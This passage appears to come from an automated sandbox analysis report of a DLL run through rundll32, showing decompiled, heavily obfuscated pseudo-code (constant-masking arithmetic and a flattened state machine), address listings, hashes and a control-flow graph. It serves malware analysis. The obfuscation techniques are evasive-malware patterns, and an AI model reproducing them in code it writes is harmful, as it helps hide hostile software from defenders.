                                                                        				_v300 = _v300 + 0xffffa6e4;
                                                                        				_v300 = _v300 ^ 0xe4875a6c;
                                                                        				_v176 = 0xcd87;
                                                                        				_v176 = _v176 + 0xffff9544;
                                                                        				_v176 = _v176 / _t894;
                                                                        				_v176 = _v176 ^ 0x80000368;
                                                                        				_v248 = 0xa869;
                                                                        				_v248 = _v248 + 0xffff8a84;
                                                                        				_v248 = _v248 | 0x3280cd8c;
                                                                        				_t895 = 0x2c;
                                                                        				_v248 = _v248 * 0x62;
                                                                        				_v248 = _v248 ^ 0x5561f8ba;
                                                                        				_v112 = 0xf823;
                                                                        				_v112 = _v112 ^ 0xdc5ee9a3;
                                                                        				_v112 = _v112 ^ 0xdc5e1183;
                                                                        				_v284 = 0xd3bc;
                                                                        				_v284 = _v284 + 0xffffd98b;
                                                                        				_v284 = _v284 + 0x486f;
                                                                        				_v284 = _v284 | 0x91fa5adb;
                                                                        				_v284 = _v284 ^ 0x91fa81ff;
                                                                        				_v220 = 0x23c4;
                                                                        				_v220 = _v220 + 0x24bf;
                                                                        				_v220 = _v220 >> 0xe;
                                                                        				_v220 = _v220 ^ 0x0000397d;
                                                                        				_v324 = 0x9c0e;
                                                                        				_v324 = _v324 / _t895;
                                                                        				_v324 = _v324 ^ 0x81dfe71b;
                                                                        				_v324 = _v324 | 0x74c77561;
                                                                        				_v324 = _v324 ^ 0xf5dfe4bc;
                                                                        				_v244 = 0x9f78;
                                                                        				_t896 = 0x30;
                                                                        				_v244 = _v244 / _t896;
                                                                        				_v244 = _v244 + 0xbc13;
                                                                        				_v244 = _v244 + 0xffff658a;
                                                                        				_v244 = _v244 ^ 0x00005446;
                                                                        				_v276 = 0xb1b5;
                                                                        				_v276 = _v276 >> 6;
                                                                        				_t897 = 0x51;
                                                                        				_v276 = _v276 * 0x2c;
                                                                        				_v276 = _v276 ^ 0xbae7ac45;
                                                                        				_v276 = _v276 ^ 0xbae7c01a;
                                                                        				_v124 = 0x48e3;
                                                                        				_v124 = _v124 / _t897;
                                                                        				_v124 = _v124 ^ 0x0000464a;
                                                                        				_v40 = 0xb973;
                                                                        				_v40 = _v40 + 0x5be4;
                                                                        				_v40 = _v40 ^ 0x0001169b;
                                                                        				_v160 = 0x90d2;
                                                                        				_v160 = _v160 ^ 0xc876beee;
                                                                        				_v160 = _v160 ^ 0xab2ec0d4;
                                                                        				_v160 = _v160 ^ 0x63589e4c;
                                                                        				_v216 = 0xebb5;
                                                                        				_v216 = _v216 + 0x1b6c;
                                                                        				_v216 = _v216 + 0x5cd2;
                                                                        				_v216 = _v216 ^ 0x000123a2;
                                                                        				_v136 = 0xd2d;
                                                                        				_v136 = _v136 ^ 0xde320a5a;
                                                                        				_v136 = _v136 ^ 0xde322c98;
                                                                        				_v316 = 0x9c31;
                                                                        				_v316 = _v316 + 0x87ce;
                                                                        				_v316 = _v316 >> 0xf;
                                                                        				_v316 = _v316 << 0xf;
                                                                        				_v316 = _v316 ^ 0x000161f3;
                                                                        				_v68 = 0xaa4;
                                                                        				_v68 = _v68 | 0x379a6afa;
                                                                        				_v68 = _v68 ^ 0x379a4249;
                                                                        				_v72 = 0x66fd;
                                                                        				_v72 = _v72 ^ 0x1bf5aa39;
                                                                        				_v72 = _v72 ^ 0x1bf5cfe8;
                                                                        				_v240 = 0x10ca;
                                                                        				_v240 = _v240 >> 2;
                                                                        				_v240 = _v240 + 0x9cc9;
                                                                        				_v240 = _v240 ^ 0x8ecb9aa9;
                                                                        				_v240 = _v240 ^ 0x8ecb190c;
                                                                        				_v80 = 0x1ce5;
                                                                        				_v80 = _v80 + 0x5a3a;
                                                                        				_v80 = _v80 ^ 0x000031ae;
                                                                        				_v180 = 0x6dd0;
                                                                        				_v180 = _v180 | 0x96bfe9d3;
                                                                        				_v180 = _v180 + 0x5bad;
                                                                        				_v180 = _v180 ^ 0x96c064a5;
                                                                        				_v56 = 0x4ba5;
                                                                        				_v56 = _v56 >> 9;
                                                                        				_v56 = _v56 ^ 0x000020d5;
                                                                        				_v164 = 0xc88c;
                                                                        				_v164 = _v164 >> 0xf;
                                                                        				_v164 = _v164 + 0xffffb953;
                                                                        				_v164 = _v164 ^ 0xffffcdf3;
                                                                        				_v172 = 0xd4f7;
                                                                        				_v172 = _v172 + 0x6d56;
                                                                        				_t898 = 0x71;
                                                                        				_v172 = _v172 / _t898;
                                                                        				_v172 = _v172 ^ 0x00007fec;
                                                                        				_v64 = 0x2274;
                                                                        				_v64 = _v64 << 5;
                                                                        				_v64 = _v64 ^ 0x00042253;
                                                                        				_v280 = 0xbd0e;
                                                                        				_v280 = _v280 ^ 0x300005f5;
                                                                        				_v280 = _v280 ^ 0x6939e5f4;
                                                                        				_t899 = 0x4e;
                                                                        				_v280 = _v280 * 0x37;
                                                                        				_v280 = _v280 ^ 0x2b52c5dd;
                                                                        				_v104 = 0xaf51;
                                                                        				_v104 = _v104 << 7;
                                                                        				_v104 = _v104 ^ 0x0057daf8;
                                                                        				_v120 = 0x5a17;
                                                                        				_v120 = _v120 << 7;
                                                                        				_v120 = _v120 ^ 0x002d33fc;
                                                                        				_v288 = 0x6e7b;
                                                                        				_v288 = _v288 + 0xa186;
                                                                        				_v288 = _v288 + 0xffffb015;
                                                                        				_v288 = _v288 >> 2;
                                                                        				_v288 = _v288 ^ 0x00005323;
                                                                        				_v296 = 0x1ff6;
                                                                        				_v296 = _v296 * 0x6d;
                                                                        				_t900 = 0x76;
                                                                        				_v296 = _v296 / _t899;
                                                                        				_v296 = _v296 << 0xf;
                                                                        				_v296 = _v296 ^ 0x1654878a;
                                                                        				_v304 = 0x17a6;
                                                                        				_v304 = _v304 >> 0xd;
                                                                        				_v304 = _v304 >> 0x10;
                                                                        				_v304 = _v304 ^ 0x39a777a9;
                                                                        				_v304 = _v304 ^ 0x39a71383;
                                                                        				_v312 = 0xc1c5;
                                                                        				_v312 = _v312 << 4;
                                                                        				_v312 = _v312 / _t900;
                                                                        				_t901 = 0x24;
                                                                        				_v312 = _v312 / _t901;
                                                                        				_v312 = _v312 ^ 0x000020a2;
                                                                        				_v128 = 0xa7c2;
                                                                        				_v128 = _v128 | 0x73e84681;
                                                                        				_v128 = _v128 ^ 0x73e882e0;
                                                                        				_v108 = 0xedc0;
                                                                        				_v108 = _v108 + 0xffff38f3;
                                                                        				_v108 = _v108 ^ 0x00004e88;
                                                                        				_v268 = 0x4cb2;
                                                                        				_v268 = _v268 + 0xffff581a;
                                                                        				_t902 = 5;
                                                                        				_v268 = _v268 * 0x7f;
                                                                        				_v268 = _v268 / _t902;
                                                                        				_v268 = _v268 ^ 0x332a7d68;
                                                                        				_v48 = 0x3775;
                                                                        				_v48 = _v48 >> 7;
                                                                        				_v48 = _v48 ^ 0x00003c2f;
                                                                        				_v332 = 0x2e5;
                                                                        				_v332 = _v332 + 0x973e;
                                                                        				_v332 = _v332 + 0x582d;
                                                                        				_v332 = _v332 | 0x4e46aea0;
                                                                        				_v332 = _v332 ^ 0x4e46f01a;
                                                                        				_v92 = 0xecb2;
                                                                        				_v92 = _v92 >> 0x10;
                                                                        				_v92 = _v92 ^ 0x00005860;
                                                                        				_v192 = 0x76ab;
                                                                        				_t903 = 0x58;
                                                                        				_v192 = _v192 / _t903;
                                                                        				_v192 = _v192 + 0xffffedde;
                                                                        				_v192 = _v192 ^ 0xfffff039;
                                                                        				_v168 = 0x569e;
                                                                        				_v168 = _v168 | 0x8ce6da82;
                                                                        				_v168 = _v168 ^ 0x7e552d9e;
                                                                        				_v168 = _v168 ^ 0xf2b39afb;
                                                                        				_v200 = 0x850f;
                                                                        				_v200 = _v200 >> 2;
                                                                        				_v200 = _v200 + 0xffffcd47;
                                                                        				_v200 = _v200 ^ 0xfffff22a;
                                                                        				_v336 = 0x9261;
                                                                        				_v336 = _v336 << 0x10;
                                                                        				_v336 = _v336 ^ 0x556f5d5a;
                                                                        				_v336 = _v336 | 0x84e7afbb;
                                                                        				_v336 = _v336 ^ 0xc7efb11f;
                                                                        				_v260 = 0x9df0;
                                                                        				_v260 = _v260 ^ 0x6037a460;
                                                                        				_t904 = 0x6e;
                                                                        				_v260 = _v260 / _t904;
                                                                        				_t905 = 0x5d;
                                                                        				_v260 = _v260 / _t905;
                                                                        				_v260 = _v260 ^ 0x00026a3e;
                                                                        				_v184 = 0x2584;
                                                                        				_v184 = _v184 | 0x91f1cbbd;
                                                                        				_v184 = _v184 + 0xffff1018;
                                                                        				_v184 = _v184 ^ 0x91f0cf67;
                                                                        				_v152 = 0x8ca9;
                                                                        				_t906 = 0x4a;
                                                                        				_v152 = _v152 / _t906;
                                                                        				_v152 = _v152 << 4;
                                                                        				_v152 = _v152 ^ 0x00006513;
                                                                        				_v84 = 0x77f3;
                                                                        				_v84 = _v84 + 0xffff3db1;
                                                                        				_v84 = _v84 ^ 0xffffc1c9;
                                                                        				_v52 = 0x587;
                                                                        				_v52 = _v52 | 0x675f08fe;
                                                                        				_v52 = _v52 ^ 0x675f36dd;
                                                                        				_v76 = 0xbba2;
                                                                        				_v76 = _v76 >> 3;
                                                                        				_v76 = _v76 ^ 0x00005deb;
                                                                        				_v328 = 0xf0a5;
                                                                        				_v328 = _v328 | 0xb0da4f33;
                                                                        				_v328 = _v328 >> 2;
                                                                        				_v328 = _v328 + 0x1048;
                                                                        				_v328 = _v328 ^ 0x2c36fa11;
                                                                        				_v36 = 0x2a74;
                                                                        				_v36 = _v36 >> 0xb;
                                                                        				_v36 = _v36 ^ 0x00007692;
                                                                        				_v188 = 0x2f66;
                                                                        				_v188 = _v188 ^ 0x45e45990;
                                                                        				_t907 = 0x18;
                                                                        				_v188 = _v188 * 0x59;
                                                                        				_v188 = _v188 ^ 0x4c6d2c94;
                                                                        				_v196 = 0xbe6b;
                                                                        				_v196 = _v196 | 0xf46158a2;
                                                                        				_v196 = _v196 >> 0xc;
                                                                        				_v196 = _v196 ^ 0x000f6213;
                                                                        				_v88 = 0x4547;
                                                                        				_v88 = _v88 << 1;
                                                                        				_v88 = _v88 ^ 0x0000e110;
                                                                        				_v96 = 0xb81;
                                                                        				_v96 = _v96 | 0xae38e917;
                                                                        				_v96 = _v96 ^ 0xae38b032;
                                                                        				_v256 = 0x7754;
                                                                        				_v256 = _v256 + 0xfa4d;
                                                                        				_v256 = _v256 | 0x1efef3a7;
                                                                        				_v256 = _v256 * 0xd;
                                                                        				_v256 = _v256 ^ 0x92ff6df5;
                                                                        				_v228 = 0xfbcd;
                                                                        				_v228 = _v228 | 0x05cff199;
                                                                        				_v228 = _v228 + 0xcc2;
                                                                        				_v228 = _v228 ^ 0x05d05a46;
                                                                        				_v320 = 0x8c88;
                                                                        				_v320 = _v320 + 0xc4c7;
                                                                        				_v320 = _v320 ^ 0x8fac5d5e;
                                                                        				_v320 = _v320 * 0x41;
                                                                        				_v320 = _v320 ^ 0x7af02945;
                                                                        				_v224 = 0xc0c1;
                                                                        				_v224 = _v224 >> 0xe;
                                                                        				_v224 = _v224 << 0xf;
                                                                        				_v224 = _v224 ^ 0x0001d04a;
                                                                        				_v132 = 0x9e59;
                                                                        				_v132 = _v132 | 0x8ad22999;
                                                                        				_v132 = _v132 ^ 0x8ad28a97;
                                                                        				_v264 = 0xdddc;
                                                                        				_v264 = _v264 | 0xc797c5af;
                                                                        				_v264 = _v264 << 0xc;
                                                                        				_v264 = _v264 + 0xffffdbb5;
                                                                        				_v264 = _v264 ^ 0x7ddf8dbd;
                                                                        				_v272 = 0xbb3;
                                                                        				_v272 = _v272 + 0xffffc942;
                                                                        				_v272 = _v272 + 0x6fc5;
                                                                        				_v272 = _v272 / _t907;
                                                                        				_v272 = _v272 ^ 0x00002501;
                                                                        				_v204 = 0x93cc;
                                                                        				_v204 = _v204 << 9;
                                                                        				_v204 = _v204 * 0x25;
                                                                        				_v204 = _v204 ^ 0x2ab896dd;
                                                                        				_v212 = 0x2aa;
                                                                        				_v212 = _v212 << 0xf;
                                                                        				_v212 = _v212 + 0xea80;
                                                                        				_v212 = _v212 ^ 0x0155e81e;
                                                                        				_v140 = 0x154e;
                                                                        				_t908 = 0x5c;
                                                                        				_v140 = _v140 / _t908;
                                                                        				_v140 = _v140 >> 0xf;
                                                                        				_v140 = _v140 ^ 0x000002fd;
                                                                        				_v148 = 0xb2ba;
                                                                        				_v148 = _v148 >> 8;
                                                                        				_v148 = _v148 + 0xffffdc87;
                                                                        				_v148 = _v148 ^ 0xffffeb86;
                                                                        				_v156 = 0x2cda;
                                                                        				_v156 = _v156 << 8;
                                                                        				_v156 = _v156 >> 1;
                                                                        				_v156 = _v156 ^ 0x0016035f;
                                                                        				_v232 = 0xbd1e;
                                                                        				_t909 = 0x6e;
                                                                        				_v232 = _v232 / _t909;
                                                                        				_v232 = _v232 >> 6;
                                                                        				_v232 = _v232 << 0xa;
                                                                        				_v232 = _v232 ^ 0x00003d22;
                                                                        				_t910 = _v28;
                                                                        				while(1) {
                                                                        					L1:
                                                                        					_t876 = 0xefeb7d0;
                                                                        					while(1) {
                                                                        						_t923 = _t911 - _t876;
                                                                        						if(_t923 <= 0) {
                                                                        						}
                                                                        						L3:
                                                                        						if(_t923 == 0) {
                                                                        							_t782 = E10009B08(_v280, _v104, _t817, _v112, _v120, _t817, _v288, _a36, _v24, _v296, _v304, _t817, _v312, _v128, _a8);
                                                                        							_t919 = _t919 + 0x38;
                                                                        							_v340 = _t782;
                                                                        							__eflags = _t782;
                                                                        							_t911 =  !=  ? 0x21341eb : 0x5c03e16;
                                                                        							goto L15;
                                                                        						} else {
                                                                        							if(_t911 == 0x17e99f4) {
                                                                        								E10008DF2(_v228, _t910, _v320, _v224, _v132);
                                                                        								_t919 = _t919 + 0xc;
                                                                        								goto L22;
                                                                        							} else {
                                                                        								if(_t911 == 0x21341eb) {
                                                                        									__eflags = _t815;
                                                                        									if(__eflags != 0) {
                                                                        										_push(0x10001244);
                                                                        										_push(_v48);
                                                                        										_t800 = E1001BF25(_v108, _v268, __eflags);
                                                                        										_t817 = _t800;
                                                                        										_v344 = _t800;
                                                                        									}
                                                                        									_t794 = E10003391(_a20, _t817, _t817, _t817, _v332, _v92, _v176 | _v300 | _v60 | _v236 | _v100 | _v208 | _v44 | _v292 | _v144, _v340, _v192, _v168, _v200, _t817, _v336, _t817, _v260);
                                                                        									_t910 = _t794;
                                                                        									_t824 = _v184;
                                                                        									E1001C5F7(_t824, _v152, _v84, _v52, _v344);
                                                                        									_t919 = _t919 + 0x40;
                                                                        									__eflags = _t794;
                                                                        									if(__eflags == 0) {
                                                                        										L22:
                                                                        										_t911 = 0x3b577df8;
                                                                        									} else {
                                                                        										_push(_t824);
                                                                        										_v28 = 1;
                                                                        										_t799 = E100022E8(_v76, _t910,  &_v28, _t824, _v328, _v36);
                                                                        										_t919 = _t919 + 0x14;
                                                                        										_v28 = _t799;
                                                                        										_t911 = 0x2b165a6b;
                                                                        									}
                                                                        									goto L14;
                                                                        								} else {
                                                                        									if(_t911 == 0x5c03e16) {
                                                                        										E10008DF2(_v140, _v24, _v148, _v156, _v232);
                                                                        									} else {
                                                                        										if(_t911 == 0x6187cef) {
                                                                        											__eflags = E10006AC1(_t910, _v252, __eflags) - _v308;
                                                                        											_t911 =  ==  ? 0x121268fd : 0x17e99f4;
                                                                        											goto L14;
                                                                        										} else {
                                                                        											if(_t911 != 0xe64d539) {
                                                                        												L41:
                                                                        												__eflags = _t911 - 0x18f37a27;
                                                                        												if(__eflags != 0) {
                                                                        													while(1) {
                                                                        														_t923 = _t911 - _t876;
                                                                        														if(_t923 <= 0) {
                                                                        														}
                                                                        														goto L24;
                                                                        													}
                                                                        													goto L3;
                                                                        												}
                                                                        											} else {
                                                                        												_v20 = 0x200;
                                                                        												_t806 = E100157E8(0x200);
                                                                        												_t916 = _t806;
                                                                        												_t833 = 0x200;
                                                                        												if(_t806 != 0) {
                                                                        													_t834 = _v324;
                                                                        													_t808 = E10007B20(_t834, _t916, _t833, _v244,  &_v20);
                                                                        													_t921 = _t919 + 0xc;
                                                                        													if(_t808 == 0) {
                                                                        														_push(_v160);
                                                                        														_push(_t834);
                                                                        														_t810 = E1001CDCC(_v276, _v124, _v40, _v116, _t834, _t916);
                                                                        														_t921 = _t921 + 0x18;
                                                                        														_v32 = _t810;
                                                                        													}
                                                                        													E100091CD(_v216, _v136, _v316, _t916, _v68);
                                                                        													_t919 = _t921 + 0xc;
                                                                        												}
                                                                        												_t911 = 0x26e9ad1b;
                                                                        												L14:
                                                                        												_t782 = _v340;
                                                                        												L15:
                                                                        												_t817 = _v344;
                                                                        												goto L1;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L44:
                                                                        						return _t917;
                                                                        						L24:
                                                                        						__eflags = _t911 - 0x121268fd;
                                                                        						if(_t911 == 0x121268fd) {
                                                                        							__eflags = E1001676B(_t910, _a28);
                                                                        							_t911 = 0x17e99f4;
                                                                        							_t776 = 1;
                                                                        							_t917 =  !=  ? _t776 : _t917;
                                                                        							goto L40;
                                                                        						} else {
                                                                        							__eflags = _t911 - 0x26e9ad1b;
                                                                        							if(_t911 == 0x26e9ad1b) {
                                                                        								_push(_t817);
                                                                        								_t779 = E100089C3(_v32, _t876, _v72, _v240, _v80, _v180, _t817, _v248);
                                                                        								__eflags = _t779;
                                                                        								_v24 = _t779;
                                                                        								_t911 =  !=  ? 0xefeb7d0 : 0x18f37a27;
                                                                        								E100091CD(_v56, _v164, _v172, _v32, _v64);
                                                                        								_t919 = _t919 + 0x28;
                                                                        								L40:
                                                                        								_t817 = _v344;
                                                                        								_t876 = 0xefeb7d0;
                                                                        								goto L41;
                                                                        							} else {
                                                                        								__eflags = _t911 - 0x2a775466;
                                                                        								if(__eflags == 0) {
                                                                        									_t911 = 0xe64d539;
                                                                        									continue;
                                                                        								} else {
                                                                        									__eflags = _t911 - 0x2b165a6b;
                                                                        									if(_t911 == 0x2b165a6b) {
                                                                        										__eflags = _t815;
                                                                        										if(_t815 == 0) {
                                                                        											_t811 = 0;
                                                                        											__eflags = 0;
                                                                        										} else {
                                                                        											_t811 =  *((intOrPtr*)(_t815 + 4));
                                                                        										}
                                                                        										__eflags = _t815;
                                                                        										if(_t815 == 0) {
                                                                        											_t879 = 0;
                                                                        											__eflags = 0;
                                                                        										} else {
                                                                        											_t879 =  *_t815;
                                                                        										}
                                                                        										_push(_t817);
                                                                        										E10007D55(_v188, _t879, _a40, _v196, _v88, _t910, _t811, _v96, _v256);
                                                                        										_t919 = _t919 + 0x20;
                                                                        										asm("sbb esi, esi");
                                                                        										_t911 = (_t911 & 0x0499e2fb) + 0x17e99f4;
                                                                        										goto L14;
                                                                        									} else {
                                                                        										__eflags = _t911 - 0x3b577df8;
                                                                        										if(_t911 != 0x3b577df8) {
                                                                        											goto L41;
                                                                        										} else {
                                                                        											E10008DF2(_v264, _t782, _v272, _v204, _v212);
                                                                        											_t919 = _t919 + 0xc;
                                                                        											_t911 = 0x5c03e16;
                                                                        											goto L14;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L44;
                                                                        					}
                                                                        				}
                                                                        			}
                                                                        0x1000b777
                                                                        0x1000b78a
                                                                        0x1000b78b
                                                                        0x1000b792
                                                                        0x1000b79d
                                                                        0x1000b7a8
                                                                        0x1000b7b3
                                                                        0x1000b7bb
                                                                        0x1000b7c6
                                                                        0x1000b7d1
                                                                        0x1000b7d8
                                                                        0x1000b7e3
                                                                        0x1000b7ee
                                                                        0x1000b7f9
                                                                        0x1000b804
                                                                        0x1000b80c
                                                                        0x1000b814
                                                                        0x1000b821
                                                                        0x1000b825
                                                                        0x1000b82d
                                                                        0x1000b838
                                                                        0x1000b843
                                                                        0x1000b84e
                                                                        0x1000b859
                                                                        0x1000b861
                                                                        0x1000b869
                                                                        0x1000b876
                                                                        0x1000b87a
                                                                        0x1000b882
                                                                        0x1000b88d
                                                                        0x1000b895
                                                                        0x1000b89d
                                                                        0x1000b8a8
                                                                        0x1000b8b3
                                                                        0x1000b8be
                                                                        0x1000b8c9
                                                                        0x1000b8d1
                                                                        0x1000b8d9
                                                                        0x1000b8de
                                                                        0x1000b8e6
                                                                        0x1000b8ee
                                                                        0x1000b8f6
                                                                        0x1000b8fe
                                                                        0x1000b90c
                                                                        0x1000b910
                                                                        0x1000b918
                                                                        0x1000b923
                                                                        0x1000b933
                                                                        0x1000b93a
                                                                        0x1000b945
                                                                        0x1000b952
                                                                        0x1000b95a
                                                                        0x1000b965
                                                                        0x1000b970
                                                                        0x1000b984
                                                                        0x1000b989
                                                                        0x1000b992
                                                                        0x1000b99a
                                                                        0x1000b9a5
                                                                        0x1000b9b0
                                                                        0x1000b9b8
                                                                        0x1000b9c3
                                                                        0x1000b9ce
                                                                        0x1000b9d9
                                                                        0x1000b9e1
                                                                        0x1000b9e8
                                                                        0x1000b9f3
                                                                        0x1000ba05
                                                                        0x1000ba08
                                                                        0x1000ba0f
                                                                        0x1000ba17
                                                                        0x1000ba1f
                                                                        0x1000ba2a
                                                                        0x1000ba35
                                                                        0x1000ba35
                                                                        0x1000ba35
                                                                        0x1000ba3a
                                                                        0x1000ba3a
                                                                        0x1000ba3c
                                                                        0x1000ba3c
                                                                        0x1000ba42
                                                                        0x1000ba42
                                                                        0x1000bcd2
                                                                        0x1000bcd7
                                                                        0x1000bcda
                                                                        0x1000bcde
                                                                        0x1000bcea
                                                                        0x00000000
                                                                        0x1000ba48
                                                                        0x1000ba4e
                                                                        0x1000bc75
                                                                        0x1000bc7a
                                                                        0x00000000
                                                                        0x1000ba54
                                                                        0x1000ba5b
                                                                        0x1000bb4e
                                                                        0x1000bb50
                                                                        0x1000bb52
                                                                        0x1000bb57
                                                                        0x1000bb69
                                                                        0x1000bb70
                                                                        0x1000bb72
                                                                        0x1000bb72
                                                                        0x1000bbe6
                                                                        0x1000bbef
                                                                        0x1000bc06
                                                                        0x1000bc0d
                                                                        0x1000bc12
                                                                        0x1000bc15
                                                                        0x1000bc17
                                                                        0x1000bc7d
                                                                        0x1000bc7d
                                                                        0x1000bc19
                                                                        0x1000bc19
                                                                        0x1000bc2a
                                                                        0x1000bc41
                                                                        0x1000bc46
                                                                        0x1000bc49
                                                                        0x1000bc50
                                                                        0x1000bc50
                                                                        0x00000000
                                                                        0x1000ba61
                                                                        0x1000ba67
                                                                        0x1000be83
                                                                        0x1000ba6d
                                                                        0x1000ba73
                                                                        0x1000bb42
                                                                        0x1000bb49
                                                                        0x00000000
                                                                        0x1000ba79
                                                                        0x1000ba7f
                                                                        0x1000be4f
                                                                        0x1000be4f
                                                                        0x1000be55
                                                                        0x1000ba3a
                                                                        0x1000ba3a
                                                                        0x1000ba3c
                                                                        0x1000ba3c
                                                                        0x00000000
                                                                        0x1000ba3c
                                                                        0x00000000
                                                                        0x1000ba3a
                                                                        0x1000ba85
                                                                        0x1000ba96
                                                                        0x1000ba9d
                                                                        0x1000baa2
                                                                        0x1000baa4
                                                                        0x1000baa7
                                                                        0x1000bab8
                                                                        0x1000babc
                                                                        0x1000bac1
                                                                        0x1000bac6
                                                                        0x1000bac8
                                                                        0x1000bacf
                                                                        0x1000baeb
                                                                        0x1000baf0
                                                                        0x1000baf3
                                                                        0x1000baf3
                                                                        0x1000bb14
                                                                        0x1000bb19
                                                                        0x1000bb19
                                                                        0x1000bb1c
                                                                        0x1000bb21
                                                                        0x1000bb21
                                                                        0x1000bb25
                                                                        0x1000bb25
                                                                        0x00000000
                                                                        0x1000bb25
                                                                        0x1000ba7f
                                                                        0x1000ba73
                                                                        0x1000ba67
                                                                        0x1000ba5b
                                                                        0x1000ba4e
                                                                        0x1000be8d
                                                                        0x1000be97
                                                                        0x1000bcf2
                                                                        0x1000bcf2
                                                                        0x1000bcf8
                                                                        0x1000be39
                                                                        0x1000be3b
                                                                        0x1000be42
                                                                        0x1000be43
                                                                        0x00000000
                                                                        0x1000bcfe
                                                                        0x1000bcfe
                                                                        0x1000bd04
                                                                        0x1000bdba
                                                                        0x1000bde3
                                                                        0x1000bdef
                                                                        0x1000bdf1
                                                                        0x1000be17
                                                                        0x1000be21
                                                                        0x1000be26
                                                                        0x1000be46
                                                                        0x1000be46
                                                                        0x1000be4a
                                                                        0x00000000
                                                                        0x1000bd0a
                                                                        0x1000bd0a
                                                                        0x1000bd10
                                                                        0x1000bdb0
                                                                        0x00000000
                                                                        0x1000bd16
                                                                        0x1000bd16
                                                                        0x1000bd1c
                                                                        0x1000bd54
                                                                        0x1000bd56
                                                                        0x1000bd5d
                                                                        0x1000bd5d
                                                                        0x1000bd58
                                                                        0x1000bd58
                                                                        0x1000bd58
                                                                        0x1000bd5f
                                                                        0x1000bd61
                                                                        0x1000bd67
                                                                        0x1000bd67
                                                                        0x1000bd63
                                                                        0x1000bd63
                                                                        0x1000bd63
                                                                        0x1000bd69
                                                                        0x1000bd93
                                                                        0x1000bd98
                                                                        0x1000bd9d
                                                                        0x1000bda5
                                                                        0x00000000
                                                                        0x1000bd1e
                                                                        0x1000bd1e
                                                                        0x1000bd24
                                                                        0x00000000
                                                                        0x1000bd2a
                                                                        0x1000bd42
                                                                        0x1000bd47
                                                                        0x1000bd4a
                                                                        0x00000000
                                                                        0x1000bd4a
                                                                        0x1000bd24
                                                                        0x1000bd1c
                                                                        0x1000bd10
                                                                        0x1000bd04
                                                                        0x00000000
                                                                        0x1000bcf8
                                                                        0x1000ba3a

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "=$#S$-$-X$/<$:Z$E$FT$GE$JF$M$Tw$Vm$Z]oU$f/$fTw*$fTw*$gO$h}*3$oH$t"$t*$}9$[$]
                                                                        • API String ID: 0-299718466
                                                                        • Opcode ID: 096944ea9d644cbed8a91504d9663a7921678804b23d5a58477bd81ded31b560
                                                                        • Instruction ID: bcb940ab0b51ba9aa32f5f7e717e54d56ca378d12b6cd42c33ee8c0488dd72e2
                                                                        • Opcode Fuzzy Hash: 096944ea9d644cbed8a91504d9663a7921678804b23d5a58477bd81ded31b560
                                                                        • Instruction Fuzzy Hash: 4882FF715087808BE3B4CF25C98AB9FBBE1FBC4354F108A1DE6D9962A0D7B58945CF42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 447 10019dc0-1001aa08 call 100056b2 450 1001aa0f-1001aa15 447->450 451 1001ad8b-1001ad91 450->451 452 1001aa1b 450->452 455 1001afb3-1001afdc call 100091cd 451->455 456 1001ad97-1001ad9d 451->456 453 1001aa21-1001aa27 452->453 454 1001ad1d-1001ad4e call 1000adbd call 100157e8 452->454 459 1001ab9d-1001aba3 453->459 460 1001aa2d 453->460 499 1001b011-1001b01d 454->499 507 1001ad54-1001ad7b call 1001bd4a 454->507 475 1001afe1-1001afe7 455->475 461 1001ada3-1001ada9 456->461 462 1001af8f-1001afa9 call 10017b6b 456->462 466 1001aba9-1001abaf 459->466 467 1001acdf-1001ad12 call 100106c2 459->467 469 1001ab71-1001ab93 call 100091cd 460->469 470 1001aa33-1001aa39 460->470 463 1001adaf-1001adb5 461->463 464 1001af5e-1001af84 call 10011259 461->464 462->455 473 1001af25-1001af52 call 1000c07d 463->473 474 1001adbb-1001adc1 463->474 464->462 476 1001abb5-1001abbb 466->476 477 1001ac59-1001acd4 call 1000adce 466->477 467->454 469->459 480 1001ab3f-1001ab6c call 100091cd 470->480 481 1001aa3f-1001aa45 470->481 473->464 485 1001adc7-1001adcd 474->485 486 1001aecf-1001af1a call 1000a83a 474->486 475->450 487 1001afed 475->487 476->475 488 1001abc1-1001abd9 476->488 477->467 518 1001aa70-1001aa74 480->518 492 1001aa4b-1001aa51 481->492 493 1001ab0d-1001ab3a call 100091cd 481->493 497 1001add3-1001add9 485->497 498 1001ae9d-1001aec5 call 100091cd 485->498 486->473 487->499 500 1001ac38-1001ac54 488->500 501 1001abdb-1001abdd 488->501 502 1001aa53-1001aa59 492->502 503 1001aa76-1001ab08 call 1001bf25 call 100164ec call 1001c5f7 492->503 493->518 497->475 510 1001addf-1001ae91 call 1001bf25 call 10003482 call 1001c5f7 497->510 498->486 500->450 511 1001abde-1001ac28 call 100060da 501->511 502->475 512 1001aa5f-1001aa6b call 10005856 502->512 503->450 529 1001ad81 507->529 530 1001afef-1001b00e call 100091cd 507->530 510->498 533 1001ac2a-1001ac31 511->533 512->518 518->450 529->451 530->499 
533->500
                                                                        C-Code - Quality: 96%
                                                                        			E10019DC0(void* __ecx, void* __edx) {
                                                                        				void* __edi;
                                                                        				void* _t760;
                                                                        				intOrPtr _t823;
                                                                        				void* _t831;
                                                                        				signed int _t881;
                                                                        				short _t883;
                                                                        				signed int _t884;
                                                                        				signed int _t885;
                                                                        				signed int _t886;
                                                                        				signed int _t887;
                                                                        				signed int _t888;
                                                                        				signed int _t889;
                                                                        				signed int _t890;
                                                                        				signed int _t891;
                                                                        				signed int _t892;
                                                                        				signed int _t893;
                                                                        				signed int _t894;
                                                                        				signed int _t895;
                                                                        				signed int _t896;
                                                                        				signed int _t897;
                                                                        				signed int _t898;
                                                                        				signed int _t899;
                                                                        				signed int _t900;
                                                                        				signed int _t901;
                                                                        				intOrPtr _t902;
                                                                        				void* _t906;
                                                                        				signed int _t909;
